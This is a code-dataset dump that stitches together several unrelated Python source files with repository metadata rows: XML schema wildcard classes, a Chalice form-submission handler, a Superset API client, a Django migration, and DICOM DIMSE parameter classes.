elif self.maps.load_namespace(get_namespace(elem.tag)):
try:
xsd_element = self.maps.lookup_element(elem.tag)
except LookupError:
if XSI_TYPE in elem.attrib:
xsd_element = self.schema.create_element(name=elem.tag)
yield from xsd_element.iter_decode(elem, validation, **kwargs)
elif validation == 'skip' or self.process_contents == 'lax':
yield from self.any_type.iter_decode(elem, validation, **kwargs)
else:
reason = "element %r not found." % elem.tag
yield self.validation_error(validation, reason, elem, **kwargs)
else:
yield from xsd_element.iter_decode(elem, validation, **kwargs)
elif validation == 'skip':
yield self.any_type.decode(elem) if len(elem) > 0 else elem.text
elif self.process_contents == 'strict':
reason = "unavailable namespace {!r}".format(get_namespace(elem.tag))
yield self.validation_error(validation, reason, elem, **kwargs)
def iter_encode(self, obj, validation='lax', **kwargs):
name, value = obj
namespace = get_namespace(name)
if not self.is_namespace_allowed(namespace):
if validation != 'skip':
reason = "element {!r} is not allowed here".format(name)
yield self.validation_error(validation, reason, value, **kwargs)
elif self.process_contents == 'skip':
return
elif self.maps.load_namespace(namespace):
try:
xsd_element = self.maps.lookup_element(name)
except LookupError:
if validation == 'skip' or self.process_contents == 'lax':
yield from self.any_type.iter_encode(obj, validation, **kwargs)
elif self.process_contents == 'strict':
reason = "element %r not found." % name
yield self.validation_error(validation, reason, **kwargs)
else:
yield from xsd_element.iter_encode(value, validation, **kwargs)
elif validation == 'skip':
yield self.any_type.encode(value)
elif self.process_contents == 'strict':
reason = "unavailable namespace {!r}".format(namespace)
yield self.validation_error(validation, reason, **kwargs)
def is_overlap(self, other):
if not isinstance(other, XsdAnyElement):
return other.is_overlap(self)
elif self.not_namespace:
if other.not_namespace:
return True
elif '##any' in other.namespace:
return True
elif '##other' in other.namespace:
return True
else:
return any(ns not in self.not_namespace for ns in other.namespace)
elif other.not_namespace:
if '##any' in self.namespace:
return True
elif '##other' in self.namespace:
return True
else:
return any(ns not in other.not_namespace for ns in self.namespace)
elif self.namespace == other.namespace:
return True
elif '##any' in self.namespace or '##any' in other.namespace:
return True
elif '##other' in self.namespace:
return any(ns and ns != self.target_namespace for ns in other.namespace)
elif '##other' in other.namespace:
return any(ns and ns != other.target_namespace for ns in self.namespace)
else:
return any(ns in self.namespace for ns in other.namespace)
def is_consistent(self, other):
return True
class XsdAnyAttribute(XsdWildcard):
"""
Class for XSD 1.0 *anyAttribute* wildcards.
.. <anyAttribute
id = ID
namespace = ((##any | ##other) | List of (anyURI | (##targetNamespace | ##local)) )
processContents = (lax | skip | strict) : strict
{any attributes with non-schema namespace . . .}>
Content: (annotation?)
</anyAttribute>
"""
_ADMITTED_TAGS = {XSD_ANY_ATTRIBUTE}
def match(self, name, default_namespace=None, resolve=False, **kwargs):
"""
Returns the attribute wildcard if name is matching the name provided
as argument, `None` otherwise.
:param name: a local or fully-qualified name.
:param default_namespace: used when it's not `None` and not empty for \
completing local name arguments.
:param resolve: when `True` it doesn't return the wildcard but try to \
resolve and return the attribute matching the name.
:param kwargs: additional options that can be used by certain components.
"""
if not self.is_matching(name, default_namespace, **kwargs):
return
elif not resolve:
return self
try:
if name[0] != '{' and default_namespace:
return self.maps.lookup_attribute('{%s}%s' % (default_namespace, name))
else:
return self.maps.lookup_attribute(name)
except LookupError:
pass
def iter_decode(self, attribute, validation='lax', **kwargs):
name, value = attribute
if not self.is_matching(name):
if validation != 'skip':
reason = "attribute %r not allowed." % name
yield self.validation_error(validation, reason, attribute, **kwargs)
elif self.process_contents == 'skip':
return
elif self.maps.load_namespace(get_namespace(name)):
try:
xsd_attribute = self.maps.lookup_attribute(name)
except LookupError:
if validation == 'skip':
yield value
elif self.process_contents == 'strict':
reason = "attribute %r not found." % name
yield self.validation_error(validation, reason, attribute, **kwargs)
else:
yield from xsd_attribute.iter_decode(value, validation, **kwargs)
elif validation == 'skip':
yield value
elif self.process_contents == 'strict':
reason = "unavailable namespace {!r}".format(get_namespace(name))
yield self.validation_error(validation, reason, **kwargs)
def iter_encode(self, attribute, validation='lax', **kwargs):
name, value = attribute
namespace = get_namespace(name)
if not self.is_namespace_allowed(namespace):
if validation != 'skip':
reason = "attribute %r not allowed." % name
yield self.validation_error(validation, reason, attribute, **kwargs)
elif self.process_contents == 'skip':
return
elif self.maps.load_namespace(namespace):
try:
xsd_attribute = self.maps.lookup_attribute(name)
except LookupError:
if validation == 'skip':
yield str(value)
elif self.process_contents == 'strict':
reason = "attribute %r not found." % name
yield self.validation_error(validation, reason, attribute, **kwargs)
else:
yield from xsd_attribute.iter_encode(value, validation, **kwargs)
elif validation == 'skip':
yield str(value)
elif self.process_contents == 'strict':
reason = "unavailable namespace {!r}".format(get_namespace(name))
yield self.validation_error(validation, reason, **kwargs)
class Xsd11AnyElement(XsdAnyElement):
"""
Class for XSD 1.1 *any* declarations.
.. <any
id = ID
maxOccurs = (nonNegativeInteger | unbounded) : 1
minOccurs = nonNegativeInteger : 1
namespace = ((##any | ##other) | List of (anyURI | (##targetNamespace | ##local)) )
notNamespace = List of (anyURI | (##targetNamespace | ##local))
notQName = List of (QName | (##defined | ##definedSibling))
processContents = (lax | skip | strict) : strict
{any attributes with non-schema namespace . . .}>
Content: (annotation?)
</any>
"""
def _parse(self):
super(Xsd11AnyElement, self)._parse()
self._parse_not_constraints()
def is_matching(self, name, default_namespace=None, group=None, occurs=None):
"""
Returns `True` if the component name is matching the name provided as argument,
`False` otherwise. For XSD elements the matching is extended to substitutes.
:param name: a local or fully-qualified name.
:param default_namespace: used if it's not None and not empty for completing \
the name argument in case it's a local name.
:param group: used only by XSD 1.1 any element wildcards to verify siblings in \
case of ##definedSibling value in notQName attribute.
:param occurs: a Counter instance for verify model occurrences counting.
"""
if name is None:
return False
elif not name or name[0] == '{':
if not self.is_namespace_allowed(get_namespace(name)):
return False
elif default_namespace is None:
if not self.is_namespace_allowed(''):
return False
else:
name = '{%s}%s' % (default_namespace, name)
if not self.is_namespace_allowed('') \
and not self.is_namespace_allowed(default_namespace):
return False
if group in self.precedences:
if occurs is None:
if any(e.is_matching(name) for e in self.precedences[group]):
return False
elif any(e.is_matching(name) and not e.is_over(occurs[e])
for e in self.precedences[group]):
return False
if '##defined' in self.not_qname and name in self.maps.elements:
return False
if group and '##definedSibling' in self.not_qname:
if any(e.is_matching(name) for e in group.iter_elements()
if not isinstance(e, XsdAnyElement)):
return False
return name not in self.not_qname
def is_consistent(self, other):
if isinstance(other, XsdAnyElement) or self.process_contents == 'skip':
return True
xsd_element = self.match(other.name, other.default_namespace, resolve=True)
return xsd_element is None or other.is_consistent(xsd_element, strict=False)
def add_precedence(self, other, group):
if not self.precedences:
self.precedences = {}
try:
self.precedences[group].append(other)
except KeyError:
self.precedences[group] = [other]
class Xsd11AnyAttribute(XsdAnyAttribute):
"""
Class for XSD 1.1 *anyAttribute* declarations.
.. <anyAttribute
id = ID
namespace = ((##any | ##other) | List of (anyURI | (##targetNamespace | ##local)) )
notNamespace = List of (anyURI | (##targetNamespace | ##local))
notQName = List of (QName | ##defined)
processContents = (lax | skip | strict) : strict
{any attributes with non-schema namespace . . .}>
Content: (annotation?)
</anyAttribute>
"""
inheritable = False # Added for reduce checkings on XSD 1.1 attributes
def _parse(self):
super(Xsd11AnyAttribute, self)._parse()
self._parse_not_constraints()
def is_matching(self, name, default_namespace=None, **kwargs):
if name is None:
return False
elif not name or name[0] == '{':
namespace = get_namespace(name)
elif default_namespace is None:
namespace = ''
else:
name = '{%s}%s' % (default_namespace, name)
namespace = default_namespace
if '##defined' in self.not_qname and name in self.maps.attributes:
return False
return name not in self.not_qname and self.is_namespace_allowed(namespace)
class XsdOpenContent(XsdComponent):
"""
Class for XSD 1.1 *openContent* model definitions.
.. <openContent
id = ID
mode = (none | interleave | suffix) : interleave
{any attributes with non-schema namespace . . .}>
Content: (annotation?), (any?)
</openContent>
"""
_ADMITTED_TAGS = {XSD_OPEN_CONTENT}
mode = 'interleave'
any_element = None
def __init__(self, elem, schema, parent):
super(XsdOpenContent, self).__init__(elem, schema, parent)
def __repr__(self):
return '%s(mode=%r)' % (self.__class__.__name__, self.mode)
def _parse(self):
super(XsdOpenContent, self)._parse()
try:
self.mode = self.elem.attrib['mode']
except KeyError:
pass
else:
if self.mode not in {'none', 'interleave', 'suffix'}:
self.parse_error("wrong value %r for 'mode' attribute." % self.mode)
child = self._parse_child_component(self.elem)
if self.mode == 'none':
if child is not None and child.tag == XSD_ANY:
self.parse_error("an openContent with mode='none' must not "
"have an <xs:any> child declaration")
elif child is None or child.tag != XSD_ANY:
self.parse_error("an <xs:any> child declaration is required")
else:
any_element = Xsd11AnyElement(child, self.schema, self)
any_element.min_occurs = 0
any_element.max_occurs = None
self.any_element = any_element
@property
def built(self):
return True
def is_restriction(self, other):
if other is None or other.mode == 'none':
return self.mode == 'none'
elif self.mode == 'interleave' and other.mode == 'suffix':
return False
else:
return self.any_element.is_restriction(other.any_element)
class XsdDefaultOpenContent(XsdOpenContent):
"""
Class for XSD 1.1 *defaultOpenContent* model definitions.
.. <defaultOpenContent
appliesToEmpty = boolean : false
id = ID
mode = (interleave | suffix) : interleave
{any attributes with non-schema namespace . . .}>
Content: (annotation?, any)
</defaultOpenContent>
"""
_ADMITTED_TAGS = {XSD_DEFAULT_OPEN_CONTENT}
applies_to_empty = False
def __init__(self, elem, schema):
super(XsdOpenContent, self).__init__(elem, schema)
def _parse(self):
super(XsdDefaultOpenContent, self)._parse()
if self.parent is not None:
self.parse_error("defaultOpenContent must be a child of the schema")
if self.mode == 'none':
self.parse_error("the attribute 'mode' of a defaultOpenContent cannot be 'none'")
if self._parse_child_component(self.elem) is None:
self.parse_error("a defaultOpenContent declaration cannot be empty")
if self._parse_boolean_attribute('appliesToEmpty'):
self.applies_to_empty = True
| 39.750602 | 100 | 0.584306 |
26f93630d42ef63602af907c558f741e42432d7d | 10,084 | py | Python | chalicelib/routes/formResponseNew.py | epicfaace/ccmt-cff-lambda | f9fce68aeb5da024a10990600f609e50254f3a73 | [
"Apache-2.0"
] | null | null | null | chalicelib/routes/formResponseNew.py | epicfaace/ccmt-cff-lambda | f9fce68aeb5da024a10990600f609e50254f3a73 | [
"Apache-2.0"
] | 1 | 2019-06-27T04:35:29.000Z | 2019-06-28T04:32:32.000Z | chalicelib/routes/formResponseNew.py | epicfaace/ccmt-cff-lambda | f9fce68aeb5da024a10990600f609e50254f3a73 | [
"Apache-2.0"
] | null | null | null | import uuid
from chalice import UnauthorizedError
import datetime
from pydash.objects import pick, get, unset
from ..util.formSubmit.util import calculate_price
from ..util.formSubmit.couponCodes import coupon_code_verify_max_and_record_as_used
from ..util.formSubmit.emailer import send_confirmation_email, fill_string_from_template
from ..util.formSubmit.ccavenue import update_ccavenue_hash
from ..util.formSubmit.paymentMethods import fill_paymentMethods_with_data
from ..util.responseUploadImages import process_response_data_images
from chalicelib.util.patch import patch_predicate
from chalicelib.util.counter import get_counter
from chalicelib.models import Form, Response, User, UpdateTrailItem, serialize_model
from bson.objectid import ObjectId
from pymodm.errors import DoesNotExist
def get_user_or_create_one(userId):
user = None
try:
user = User.objects.get({"_id": userId})
except DoesNotExist:
user = User(id=userId)
user.save()
return user
def form_response_new(formId):
"""
Payload:
{
"data": formData,
"modifyLink": "...",
"responseId"?: "asdsadasd"
}
If responseId is defined, it is an update.
Otherwise, it is an existing submission.
"""
from ..main import app
email_sent = False
responseId = app.current_request.json_body.get("responseId", None)
if not responseId:
responseId = ObjectId()
newResponse = True
else:
responseId = ObjectId(responseId)
newResponse = False
form = Form.objects.get({"_id":ObjectId(formId)})
response_data = app.current_request.json_body["data"]
response_data = process_response_data_images(response_data)
postprocess = form.formOptions.postprocess
if postprocess and "patches" in postprocess and type(postprocess["patches"]) is list:
response_data = patch_predicate(response_data, postprocess["patches"])
counter_value = None
counter = form.formOptions.counter
if newResponse and counter and "enabled" in counter and counter["enabled"] == True:
counter_value = get_counter(formId)
modify_link = app.current_request.json_body.get('modifyLink', '')
paymentInfo = form.formOptions.paymentInfo
confirmationEmailInfo = form.formOptions.confirmationEmailInfo
paymentMethods = fill_paymentMethods_with_data(form.formOptions.paymentMethods, response_data)
def calc_item_total_to_paymentInfo(paymentInfoItem, paymentInfo):
paymentInfoItem['amount'] = calculate_price(paymentInfoItem.get('amount', '0'), response_data)
paymentInfoItem['quantity'] = calculate_price(paymentInfoItem.get('quantity', '0'), response_data)
paymentInfo['total'] += paymentInfoItem['amount'] * paymentInfoItem['quantity']
if "couponCode" in paymentInfoItem and paymentInfoItem["amount"] * paymentInfoItem["quantity"] != 0:
slots_maximum = calculate_price(paymentInfoItem.get("couponCodeMaximum", "-1"), response_data)
if slots_maximum != -1:
slots_requested = calculate_price(paymentInfoItem.get("couponCodeCount", "1"), response_data)
slots_used = form.couponCodes_used.get(paymentInfoItem["couponCode"], 0)
slots_available = slots_maximum - slots_used
slots_remaining = slots_available - slots_requested
if slots_remaining < 0:
message = "Coupon code maximum reached.\nSubmitting this form will cause you to exceed the coupon code maximum.\nNumber of spots remaining: {}".format(int(slots_available))
return False, {"res": {"success": False, "message": message, "fields_to_clear": ["couponCode"]}}
form.couponCodes_used[paymentInfoItem["couponCode"]] = slots_used + slots_requested
Form.objects.raw({"_id": form.id}).update({"$set": {f"couponCodes_used.{paymentInfoItem['couponCode']}": slots_used + slots_requested} })
return True, {}
paymentInfoItemsWithTotal = []
paymentInfoItemsInstallment = []
paymentInfo['total'] = 0
for paymentInfoItem in paymentInfo.setdefault('items', []):
paymentInfoItem.setdefault("name", "Payment Item")
paymentInfoItem.setdefault("description", "Payment Item")
paymentInfoItem.setdefault("quantity", "1")
if paymentInfoItem.get("installment", False) == True:
# Don't count "installment" payments towards the total.
paymentInfoItemsInstallment.append(paymentInfoItem)
continue
if "$total" in paymentInfoItem.get("amount", "0") or "$total" in paymentInfoItem.get("quantity", "0"):
# Take care of this at the end.
paymentInfoItemsWithTotal.append(paymentInfoItem)
continue
success, error = calc_item_total_to_paymentInfo(paymentInfoItem, paymentInfo)
if success is False:
return error
# Now take care of items for round off, etc. -- which need the total value to work.
response_data["total"] = float(paymentInfo["total"])
for paymentInfoItem in paymentInfoItemsWithTotal:
success, error = calc_item_total_to_paymentInfo(paymentInfoItem, paymentInfo)
if success is False:
return error
# Take care of installment payments now.
response_data["total"] = float(paymentInfo["total"])
for paymentInfoItem in paymentInfoItemsInstallment:
paymentInfoItem['amount'] = calculate_price(paymentInfoItem.get('amount', '0'), response_data)
paymentInfoItem['quantity'] = calculate_price(paymentInfoItem.get('quantity', '0'), response_data)
response_data.pop("total", None)
paymentInfo['items'] = [item for item in paymentInfo['items'] if item['quantity'] * item['amount'] != 0]
userId = app.get_current_user_id()
paid = paymentInfo["total"] == 0
if newResponse:
response = Response(
form=form,
id=responseId,
date_created=datetime.datetime.now(),
modify_link=modify_link + "?responseId=" + str(responseId) if modify_link else "",
counter=counter_value
)
if get(form, "formOptions.loginRequired", False) is True and userId is not "cm:cognitoUserPool:anonymousUser":
user = get_user_or_create_one(userId)
response.user = userId
# Only one response per user.
try:
Response.objects.get({"form": ObjectId(formId), "user": userId})
raise Exception(f"Response with userId {userId} already exists!")
except DoesNotExist:
pass
else:
response = Response.objects.get({"_id": responseId})
response.update_trail.append(UpdateTrailItem(
old=response.value,
new=response_data,
date=datetime.datetime.now(),
update_type="update"
))
if (response.paid == True and paymentInfo["total"] <= response.paymentInfo["total"]):
paid = True
if form.id != response.form.id:
raise UnauthorizedError(f"Response {response.id} does not belong to form {form.id}; it belongs to form {response.form.id}.")
if response.user and response.user.id != userId:
app.check_permissions(form, 'Responses_Edit')
# raise UnauthorizedError(f"User {userId} does not own response {response.id} (owner is {response.user.id})")
if newResponse or (not newResponse and paid):
response.value = response_data
response.date_modified = datetime.datetime.now()
response.paymentInfo = paymentInfo
response.paid = paid
if not newResponse:
response.update_trail.append(UpdateTrailItem(date=datetime.datetime.now(), update_type="apply_update"))
if paid and confirmationEmailInfo: # If total amount is zero (user uses coupon code to get for free)
send_confirmation_email(response, confirmationEmailInfo)
email_sent = True
# todo: fix this, should auto_email come even if not paid?
if "auto_email" in paymentMethods and get(paymentMethods, "auto_email.enabled", True) == True and type(get(paymentMethods, "autoEmail.confirmationEmailInfo") is dict):
send_confirmation_email(response, get(paymentMethods, "auto_email.confirmationEmailInfo"))
email_sent = True
response.save()
if "description" in paymentInfo and type(paymentInfo["description"]) is str:
paymentInfo["description"] = fill_string_from_template(response, paymentInfo["description"])
if "ccavenue" in paymentMethods and response.paid == False:
paymentMethods["ccavenue"] = update_ccavenue_hash(formId, paymentMethods["ccavenue"], response)
return {"res": {"value": response_data, "paid": paid, "success": True, "action": "insert", "email_sent": email_sent, "responseId": str(responseId), "paymentInfo": paymentInfo, "paymentMethods": paymentMethods } }
elif not newResponse:
# Update.
response.date_modified = datetime.datetime.now()
# Not using pending_update for now.
# response.pending_update = {
# "value": response_data,
# "paymentInfo": paymentInfo,
# }
response.value = response_data
response.paymentInfo = paymentInfo
response.paid = paid
response.save()
if "description" in paymentInfo and type(paymentInfo["description"]) is str:
paymentInfo["description"] = fill_string_from_template(response, paymentInfo["description"])
if "ccavenue" in paymentMethods and response.paid == False:
paymentMethods["ccavenue"] = update_ccavenue_hash(formId, paymentMethods["ccavenue"], response)
return {"res": {"value": response_data, "paid": paid, "success": True, "action": "update", "email_sent": email_sent, "responseId": str(responseId), "paymentInfo": paymentInfo, "paymentMethods": paymentMethods, "amt_received": {"currency": paymentInfo["currency"], "total": float(response.amount_paid or 0) } } } | 54.804348 | 319 | 0.682765 |
46c4855f6df95fbbec5222eea3afbf50e3893fde | 3,037 | py | Python | api/announcements.py | vbessonov/circulation | 3f522130242298181ce3f5e8392da70a1328fb74 | [
"Apache-2.0"
] | null | null | null | api/announcements.py | vbessonov/circulation | 3f522130242298181ce3f5e8392da70a1328fb74 | [
"Apache-2.0"
] | null | null | null | api/announcements.py | vbessonov/circulation | 3f522130242298181ce3f5e8392da70a1328fb74 | [
"Apache-2.0"
] | null | null | null | import datetime
from core.util.problem_detail import ProblemDetail
from admin.announcement_list_validator import AnnouncementListValidator
class Announcements(object):
"""Data model class for a library's announcements.
This entire list is stored as a single
ConfigurationSetting, which is why this isn't in core/model.
"""
SETTING_NAME = "announcements"
@classmethod
def for_library(cls, library):
"""Load an Announcements object for the given Library.
:param library: A Library
"""
announcements = library.setting(cls.SETTING_NAME).json_value or []
return cls(announcements)
def __init__(self, announcements):
"""Instantiate an Announcements object from a (potentially serialised)
list.
:param announcements: A value for the ANNOUNCEMENTS ConfigurationSetting,
either serialized or un-.
:return: A list of Announcement objects. The list will be empty if
there are validation errors in `announcements`.
"""
validator = AnnouncementListValidator()
validated = validator.validate_announcements(announcements)
if isinstance(validated, ProblemDetail):
# There's a problem with the way the announcements were
# serialized to the database. Treat this as an empty list.
validated = []
self.announcements = [Announcement(**data) for data in validated]
@property
def active(self):
"""Yield only the active announcements."""
for a in self.announcements:
if a.is_active:
yield a
class Announcement(object):
"""Data model class for a single library-wide announcement."""
def __init__(self, **kwargs):
"""Instantiate an Announcement from a dictionary of data.
It's assumed that the data is present and valid.
:param id: Globally unique ID for the Announcement.
:param content: Textual content of the announcement.
:param start: The date (relative to the time zone of the server)
on which the announcement should start being published.
:param finish: The date (relative to the time zone of the server)
on which the announcement should stop being published.
"""
self.id = kwargs.pop('id')
self.content = kwargs.pop('content')
self.start = AnnouncementListValidator.validate_date("", kwargs.pop('start'))
self.finish = AnnouncementListValidator.validate_date("", kwargs.pop('finish'))
@property
def is_active(self):
"""Should this announcement be displayed now?"""
today = datetime.date.today()
return self.start <= today and self.finish >= today
@property
def for_authentication_document(self):
"""The publishable representation of this announcement,
for use in an authentication document.
Basically just the ID and the content.
"""
return dict(id=self.id, content=self.content)
| 36.590361 | 87 | 0.665459 |
ad556482ebe051369c9f101b2f13a4d7444b6604 | 1,192 | py | Python | test/reports/common-games/Terminal/test_previous_month_report_for_day.py | FearFactor1/SPA | a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7 | [
"Apache-2.0"
] | 1 | 2019-12-05T06:50:54.000Z | 2019-12-05T06:50:54.000Z | test/reports/common-games/Terminal/test_previous_month_report_for_day.py | FearFactor1/SPA | a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7 | [
"Apache-2.0"
] | null | null | null | test/reports/common-games/Terminal/test_previous_month_report_for_day.py | FearFactor1/SPA | a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7 | [
"Apache-2.0"
] | null | null | null | # Отчёт за день + Кассовый отчёт + Обычные + Терминал + предыдущий месяц, к примеру будет 10 число
def test_previous_month(app):
app.report.open_page_report()
app.report.previous_month_date_10()
app.report.button_get_report()
app.report.parser_report_text()
assert "КАССОВЫЙ ОТЧЕТ ЗА ДЕНЬ" in app.report.parser_report_text()
assert "ПО ОБЫЧНОЙ ЛОТЕРЕЕ" in app.report.parser_report_text()
assert "ИТОГИ ПО ТЕРМИНАЛУ" in app.report.parser_report_text()
assert "Продавец: 2000006810-20003511" in app.report.parser_report_text()
assert "Терминал: 2000006810" in app.report.parser_report_text()
assert app.report.previous_month_C_day_10() in app.report.parser_report_text()
assert app.report.previous_month_Po_day_10() in app.report.parser_report_text()
assert 'Продажи' in app.report.parser_report_text()
assert 'Продажи за бонусы' in app.report.parser_report_text()
assert 'Отмены' in app.report.parser_report_text()
assert 'Отмены за бонусы' in app.report.parser_report_text()
assert 'Выплаты' in app.report.parser_report_text()
assert 'ИТОГО ПО КАССЕ' in app.report.parser_report_text()
app.report.comeback_main_page() | 51.826087 | 98 | 0.764262 |
2947115166efaf7a74689eb2533a978b5afbb0c5 | 634 | py | Python | app/openmrs_viamo/migrations/0005_auto_20220508_2214.py | fxavier/siecho | c2f4dc6b1169b9db2349901a96adb190cf2e3f0a | [
"MIT"
] | null | null | null | app/openmrs_viamo/migrations/0005_auto_20220508_2214.py | fxavier/siecho | c2f4dc6b1169b9db2349901a96adb190cf2e3f0a | [
"MIT"
] | null | null | null | app/openmrs_viamo/migrations/0005_auto_20220508_2214.py | fxavier/siecho | c2f4dc6b1169b9db2349901a96adb190cf2e3f0a | [
"MIT"
] | null | null | null | # Generated by Django 3.2.13 on 2022-05-08 22:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('openmrs_viamo', '0004_remove_missedappointment_tb'),
]
operations = [
migrations.AlterField(
model_name='missedappointment',
name='gender',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AlterField(
model_name='missedappointment',
name='health_facility',
field=models.CharField(blank=True, max_length=150, null=True),
),
]
| 26.416667 | 74 | 0.618297 |
ad8a36c3fe3ab51fdfc04c5a3b2c02cadddde168 | 6,674 | py | Python | supersetapiclient/base.py | opus-42/superset-api-client | df9ee80f7681ade8f4d2295c56967a23010f72ae | [
"Apache-2.0"
] | 11 | 2021-05-07T16:34:52.000Z | 2022-03-17T07:54:56.000Z | supersetapiclient/base.py | opus-42/superset-api-client | df9ee80f7681ade8f4d2295c56967a23010f72ae | [
"Apache-2.0"
] | 10 | 2021-10-08T20:03:59.000Z | 2022-03-18T18:28:09.000Z | supersetapiclient/base.py | opus-42/superset-api-client | df9ee80f7681ade8f4d2295c56967a23010f72ae | [
"Apache-2.0"
] | 6 | 2021-07-09T18:23:09.000Z | 2022-03-19T09:23:19.000Z | """Base classes."""
import logging
import dataclasses
import json
from requests import Response
from supersetapiclient.exceptions import NotFound
logger = logging.getLogger(__name__)
def json_field():
return dataclasses.field(default=None, repr=False)
def default_string():
return dataclasses.field(default="", repr=False)
class Object:
_parent = None
JSON_FIELDS = []
@classmethod
def fields(cls):
"""Get field names."""
return dataclasses.fields(cls)
@classmethod
def field_names(cls):
"""Get field names."""
return set(
f.name
for f in dataclasses.fields(cls)
)
@classmethod
def from_json(cls, json: dict):
"""Create Object from json
Args:
json (dict): a dictionary
Returns:
Object: return the related object
"""
field_names = cls.field_names()
return cls(**{k:v for k,v in json.items() if k in field_names})
def __post_init__(self):
for f in self.JSON_FIELDS:
setattr(self, f, json.loads(getattr(self, f) or "{}"))
@property
def base_url(self) -> str:
return self._parent.client.join_urls(
self._parent.base_url,
str(self.id)
)
@property
def import_url(self) -> str:
return self._parent.client.join_urls(
self._parent.base_url,
str(self.id)
)
def fetch(self) -> None:
"""Fetch additional object information."""
field_names = self.field_names()
client = self._parent.client
reponse = client.get(self.base_url)
o = reponse.json()
o = o.get("result")
for k, v in o.items():
if k in field_names:
setattr(self, k, v)
def save(self) -> None:
"""Save object information."""
o = {}
for c in self._parent.edit_columns:
if hasattr(self, c):
value = getattr(self, c)
if c in self.JSON_FIELDS:
value = json.dumps(value)
o[c] = value
response = self._parent.client.put(self.base_url, json=o)
if response.status_code in [400, 422]:
logger.error(response.text)
response.raise_for_status()
class ObjectFactories:
endpoint = ""
base_object = None
_INFO_QUERY = {
"keys": [
"add_columns",
"edit_columns"
]
}
def __init__(self, client):
"""Create a new Dashboards endpoint.
Args:
client (client): superset client
"""
self.client = client
# Get infos
response = client.get(
client.join_urls(
self.base_url,
"_info",
),
params={
"q": json.dumps(self._INFO_QUERY)
})
if response.status_code != 200:
logger.error(f"Unable to build object factory for {self.endpoint}")
response.raise_for_status()
infos = response.json()
self.edit_columns = [
e.get("name")
for e in infos.get("edit_columns", [])
]
self.add_columns = [
e.get("name")
for e in infos.get("add_columns", [])
]
@property
def base_url(self):
"""Base url for these objects."""
return self.client.join_urls(
self.client.base_url,
self.endpoint,
)
@property
def import_url(self):
"""Base url for these objects."""
return self.client.join_urls(
self.client.base_url,
self.endpoint,
"import"
)
@staticmethod
def _handle_reponse_status(reponse: Response) -> None:
"""Handle response status."""
if reponse.status_code not in (200, 201):
logger.error(f"Unable to proceed with request on ")
logger.error(f"API response is {reponse.text}")
# Finally raising for status
reponse.raise_for_status()
def get(self, id: int):
"""Get an object by id."""
url = self.base_url + str(id)
response = self.client.get(
url
)
response.raise_for_status()
response = response.json()
object_json = response.get("result")
object_json["id"] = id
object = self.base_object.from_json(object_json)
object._parent = self
return object
def find(self, **kwargs):
"""Find and get objects from api."""
url = self.base_url
# Get response
if kwargs != {}:
query = {
"filters": [
{
"col": k,
"opr": "eq",
"value": v
} for k, v in kwargs.items()
]
}
params = {
"q": json.dumps(query)
}
else:
params = {}
response = self.client.get(
url,
params=params
)
response.raise_for_status()
response = response.json()
objects = []
for r in response.get("result"):
o = self.base_object.from_json(r)
o._parent = self
objects.append(o)
return objects
def find_one(self, **kwargs):
"""Find only object or raise an Exception."""
objects = self.find(**kwargs)
if len(objects) == 0:
raise NotFound(f"No {self.base_object.__name__} has been found.")
return objects[0]
def add(self, obj) -> int:
"""Create a object on remote."""
url = self.base_url
o = {}
for c in self.add_columns:
if hasattr(obj, c):
value = getattr(obj, c)
if c in obj.JSON_FIELDS:
value = json.dumps(value)
o[c] = value
response = self.client.post(self.base_url, json=o)
response.raise_for_status()
return response.json().get("id")
def import_file(self, file_path) -> int:
"""Import a file on remote."""
url = self.import_url
file = {'formData': (file_path, open(file_path, 'rb'), 'application/json')}
response = self.client.post(url, files = file)
response.raise_for_status()
"""If import is successful, the following is returned: {'message': 'OK'}"""
if response.json().get('message') == 'OK':
return True
else:
return False
| 26.172549 | 83 | 0.51828 |
8c0d4dcc41640686d5ebba52cb6e1c7ea44b7e2d | 15,421 | py | Python | netdicom/DIMSEparameters.py | mklassen/pynetdicom | 5024d5f66f366d21d0fb1adc51f98d9c313692f7 | [
"MIT"
] | 30 | 2015-09-07T22:25:16.000Z | 2017-12-06T17:11:51.000Z | netdicom/DIMSEparameters.py | mklassen/pynetdicom | 5024d5f66f366d21d0fb1adc51f98d9c313692f7 | [
"MIT"
] | 38 | 2015-09-09T23:38:49.000Z | 2017-07-26T08:34:42.000Z | netdicom/DIMSEparameters.py | mklassen/pynetdicom | 5024d5f66f366d21d0fb1adc51f98d9c313692f7 | [
"MIT"
] | 30 | 2015-09-08T14:35:45.000Z | 2017-11-06T20:39:47.000Z | #
# Copyright (c) 2012 Patrice Munger
# This file is part of pynetdicom, released under a modified MIT license.
# See the file license.txt included with this distribution, also
# available at http://pynetdicom.googlecode.com
#
def classprinter(klass):
tmp = ''
for ii in klass.__dict__.keys():
tmp += ii + ": " + str(klass.__dict__[ii]) + '\n'
return tmp
# DIMSE-C Services
class C_STORE_ServiceParameters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.AffectedSOPClassUID = None
self.AffectedSOPInstanceUID = None
self.Priority = None
self.MoveOriginatorApplicationEntityTitle = None
self.MoveOriginatorMessageID = None
self.DataSet = None
self.Status = None
def __repr__(self):
return classprinter(self)
class C_FIND_ServiceParameters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.AffectedSOPClassUID = None
self.Priority = None
self.Identifier = None
self.Status = None
def __repr__(self):
return classprinter(self)
class C_GET_ServiceParameters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.AffectedSOPClassUID = None
self.Priority = None
self.Identifier = None
self.Status = None
self.NumberOfRemainingSubOperations = None
self.NumberOfCompletedSubOperations = None
self.NumberOfFailedSubOperations = None
self.NumberOfWarningSubOperations = None
def __repr__(self):
return classprinter(self)
class C_MOVE_ServiceParameters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.AffectedSOPClassUID = None
self.Priority = None
self.MoveDestination = None
self.Identifier = None
self.Status = None
self.NumberOfRemainingSubOperations = None
self.NumberOfCompletedSubOperations = None
self.NumberOfFailedSubOperations = None
self.NumberOfWarningSubOperations = None
def __repr__(self):
return classprinter(self)
class C_ECHO_ServiceParameters:
def __init__(self):
self.MessageID = None
self.MessageIDBeingRespondedTo = None
self.AffectedSOPClassUID = None
self.Status = None
def __repr__(self):
return classprinter(self)
# DIMSE-N services
